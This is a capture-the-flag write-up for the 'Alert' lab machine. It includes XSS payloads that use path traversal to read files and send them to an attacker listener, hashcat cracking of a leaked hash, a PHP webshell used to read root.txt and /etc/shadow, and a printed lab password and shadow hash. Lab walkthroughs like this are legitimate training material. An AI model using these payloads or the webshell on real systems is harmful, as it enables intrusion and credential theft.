Explore the fundamentals of cybersecurity in the Alert Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.11.44 alert.htb statistics.alert.htb

Script to add hosts automatically

ip="10.10.11.44"
domain="alert.htb statistics.alert.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV alert.htb

Nmap scan report for alert.htb (10.10.11.44)
Host is up (0.055s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Alert - Markdown Viewer
|_Requested resource was index.php?page=alert
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Subdomain

ffuf -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -u http://alert.htb -H 'Host: FUZZ.alert.htb' -fw 20

statistics              [Status: 401, Size: 467, Words: 42, Lines: 15, Duration: 54ms]

WebServer:

python -m http.server

Markdown xss:

<script>
fetch("http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-enabled/000-default.conf")
.then(response => response.text())
.then(data => {
    fetch("http://<vpnip>:8000/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

Url decode the response

This shows /var/www/statistics.alert.htb/.htpasswd so

<script>
fetch("http://alert.htb/messages.php?file=../../../../../var/www/statistics.alert.htb/.htpasswd")
.then(response => response.text())
.then(data => {
    fetch("http://<vpnip>:8000/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

Url decode the response

Brute Force the Hash

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat 1600 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt

This yields manchesterunited

ssh -L 8080:127.0.0.1:8080 albert@alert.htb

cat user.txt
cd /opt/website-monitor/config
echo '<?php system($_GET['cmd']);?>' > webshell.php

in your machine:

curl -s 'http://127.0.0.1:8080/config/webshell.php?cmd=cat%20/root/root.txt'

curl -s 'http://127.0.0.1:8080/config/webshell.php?cmd=cat%20/etc/shadow'

$6$gSjyQo8nJFMsegNG$jRRGms4KAq1FGTXwBJl236Ui5OKRtmaM3k8nkXuvduPXnhhaT/ZCYHHYO3GxhUAik1NaFYlBGaQZBrzQHgOhc/